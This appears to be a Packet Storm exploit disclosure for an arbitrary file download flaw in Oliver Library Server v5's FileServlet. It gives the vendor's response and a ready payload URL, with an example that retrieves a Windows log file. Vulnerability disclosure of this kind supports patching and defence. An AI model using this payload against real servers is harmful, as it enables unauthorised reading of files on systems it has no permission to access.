Oliver Library Server 5 versions prior to 8.00.008.053 suffer from an arbitrary file download vulnerability. Softlink Education has contacted Packet Storm and although they were unable to replicate this issue in their hosting environment, they have proactively made changes to the software to mitigate attempts for this attack.
010a7aadffe845f1451dfb359525b2199ba13983bb2b53cad92938a1bf21c363
# Exploit Title: Oliver Library Server v5 - Arbitrary File Download
# Date: 14/12/2021
# Exploit Authors: Mandeep Singh, Ishaan Vij, Luke Blues, CTRL Group
# Vendor Homepage: https://www.softlinkint.com/product/oliver/
# Product: Oliver Server v5
# Version: < 8.00.008.053
# Tested on: Windows Server 2016
Technical Description:
An arbitrary file download vulnerability in Oliver v5 Library Server Versions < 8.00.008.053 via the FileServlet function allows for arbitrary file download by an attacker using unsanitized user supplied input.
Steps to Exploit:
1) Use the following Payload:
https://<hostaddress>/oliver/FileServlet?source=serverFile&fileName=<arbitrary file path>
2) Example to download iis.log file:
https://<hostaddress>/oliver/FileServlet?source=serverFile&fileName=c:/windows/iis.log